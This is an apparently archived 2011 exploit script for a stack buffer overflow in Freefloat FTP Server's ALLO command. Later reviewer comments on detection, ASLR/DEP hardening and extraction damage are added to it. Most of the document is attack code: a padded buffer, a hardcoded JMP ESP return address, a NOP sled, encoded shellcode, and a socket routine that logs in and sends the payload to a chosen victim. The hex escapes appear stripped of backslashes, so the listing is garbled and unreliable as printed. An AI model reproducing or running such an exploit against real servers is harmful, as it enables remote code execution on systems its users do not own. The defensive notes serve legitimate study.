Freefloat FTP Server ALLO Buffer Overflow
Posted on 21 August 2011
#!/usr/bin/python
# Exploit Title: Freefloat FTP Server ALLO Buffer Overflow Vulnerability
# Date: 2011 Aug 20
# Author: Black.Spook
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Tested on: Windows XP SP2 EN
#
# Reviewer notes
# --------------
# Python 2 proof of concept (it uses print statements). It opens a TCP
# connection to an FTP service, sends USER/PASS with the value "test", then
# sends a single ALLO command whose argument is a long crafted string.
#
# NOTE(review): the listing is kept exactly as the page shows it. The hex
# strings carry no backslashes and the FTP command strings end in a space
# instead of a line terminator, which looks like damage from page extraction.
# As printed, every literal below is plain ASCII text.
#
# Defensive reading:
# - Detection: RFC 959 defines the ALLO argument as a decimal byte count, so
#   an ALLO line that is hundreds of bytes long or carries non-digit data is
#   a strong signal for network sensors and FTP server logs.
# - Hardening: the return value is one fixed address, annotated by the author
#   as a JMP ESP, and the only platform listed is Windows XP SP2 EN. This
#   presumably relies on a predictable module address and an executable
#   stack, the two conditions ASLR and DEP are designed to remove.
# - Root cause: presumably an unchecked copy of the ALLO argument inside the
#   server. The server code is not shown on this page, so confirm that
#   against a vendor advisory before relying on it.
import socket
import sys


def usage():
    """Print the expected command-line form and one example invocation."""
    print "usage : ./freefloatftp.py <victim_ip> <victim_port>"
    print "example: ./freefloatftp.py 192.168.1.100 21"


# The socket is created before the argument check, so it is allocated even
# when the script only prints usage and exits.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Banner only; no effect on the network behaviour.
print " "
print "#############################################################################"
print "# Freefloat FTP Server ALLO Buffer Overflow Vulnerability Exploit #"
print "#############################################################################"
print " "

# Exactly two arguments are required: target address and port.
if len(sys.argv) != 3:
    usage()
    sys.exit()

ip = sys.argv[1]
port = sys.argv[2]  # kept as a string here; converted with int() at connect time

# Layout of the ALLO argument, in order: filler, a 4-byte value the author
# labels as the return address, a run of no-op bytes, then the payload.
# The filler length (246) is presumably the distance to the saved return
# address in the vulnerable build; the page does not show how it was derived.
junk1= "x41" * 246
ret = "xEDx1Ex94x7C" #7C941EED JMP ESP (author's annotation; a fixed address, so build-specific)
nop = "x90"* 200

# windows/exec CMD=calc.exe
# Author's label for the payload: it launches calc.exe, i.e. a harmless
# demonstration of code execution. The bytes are almost entirely in the
# printable ASCII range, which suggests an alphanumeric encoder; the page
# does not name one.
shellcode =("x89xe3xdbxd4xd9x73xf4x5dx55x59x49x49x49x49"
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51"
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32"
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41"
"x42x75x4ax49x4dx6fx58x70x56x4fx54x70x4dx6e"
"x58x59x58x4bx54x69x5ax69x4dx61x56x53x4bx69"
"x52x54x45x74x4bx44x43x6ax45x61x50x7ax45x42"
"x4dx53x58x42x54x44x43x33x4dx5ax45x71x58x52"
"x50x4bx4dx46x5ax76x4dx4bx4cx74x43x56x45x77"
"x49x6cx45x6dx4cx43x56x76x54x6ex56x39x4bx70"
"x54x4bx4bx4ex51x39x4dx54x4dx77x51x65x51x6f"
"x45x6cx54x73x49x6bx4dx78x45x63x4cx34x58x36"
"x4ex6ex50x7ax47x75x54x37x56x6fx58x50x4bx75"
"x47x69x49x63x47x5ax54x5ax4bx4ax5ax6ax4bx55"
"x50x6fx4bx4bx54x4bx45x4bx4dx4fx4dx79x58x44"
"x56x30x54x72x51x4ex51x70x47x54x4ex6fx43x6f"
"x4ex46x51x33x4cx6fx56x47x5ax63x5ax53x43x74"
"x5ax32x49x5ax45x73x58x74x4ex49x4ex65x4bx6b"
"x51x6ex49x65x50x35x49x4ax51x43x5ax45x56x6a"
"x4dx45x4ex38x49x4ex49x69x56x44x54x49x54x6f"
"x47x71x52x37x50x75x49x6cx47x4cx4ex78x50x78"
"x4bx4cx52x59x47x6ex45x33x4cx4bx52x51x51x4d"
"x47x6ex4ex6cx43x71x47x6cx4fx34x56x79x43x64"
"x4cx46x4ex6fx4fx4ax4dx6cx56x57x47x33x43x6c"
"x47x46x47x4bx47x58x45x7ax54x50x43x6fx4ex4f"
"x4bx4fx54x6ax51x4bx54x64x49x6ex4bx4cx5ax4a"
"x51x6ex56x45x4ex39x4cx77x54x65x43x74x54x38"
"x47x6dx4cx4bx50x79x4cx5ax58x79x50x74x4bx6c"
"x4ex30x5ax4bx51x71x52x46x4dx6bx45x31x51x67"
"x58x6ax4bx71x5ax6cx52x57x4bx44x4bx79x51x6e"
"x54x50x4fx35x43x72x56x71x50x67x5ax7ax4bx30"
"x50x56x4fx67x4ex70x4bx39x49x6ex50x30x43x4d"
"x51x48x52x63x51x4dx51x6ex58x36x4bx37x56x38"
"x49x6dx54x73x52x57x4fx6fx47x6dx45x66x51x62"
"x4bx6bx4cx59x4fx5ax54x4ex54x34x52x6cx58x4d"
"x4dx6dx50x75x51x55x4cx6ex45x70x58x66x54x45"
"x47x6fx5ax67x4cx4ex4ex4cx51x4fx41x41")

# Final ALLO argument: filler + return value + no-op run + payload.
buff = junk1 + ret + nop + shellcode

try:
    print("[-] Connecting to " + ip + " on port " + port + " ")
    s.connect((ip,int(port)))
    data = s.recv(1024)  # reads the server greeting; the value is never used
    print("[-] Sending exploit...")
    # The login uses the literal credentials "test"/"test". Whether the server
    # accepts arbitrary credentials is not shown on this page.
    s.send("USER test ")
    s.recv(1024)
    s.send("PASS test ")
    s.recv(1024)
    # The oversized ALLO argument is the trigger. No reply is read before the
    # socket is closed, so the script never confirms any effect on the server.
    s.send("ALLO "+buff+" ")
    s.close()
    # Printed after send() returns; it only means the bytes were handed to the socket.
    print("[-] Exploit successfully sent...")
except:
    # Bare except: every failure inside the try block, including a non-numeric
    # port passed to int(), is reported as a connection error. The socket is
    # not closed on this path.
    print("[-] Connection error...")
    print("[-] Check if victim is up.")
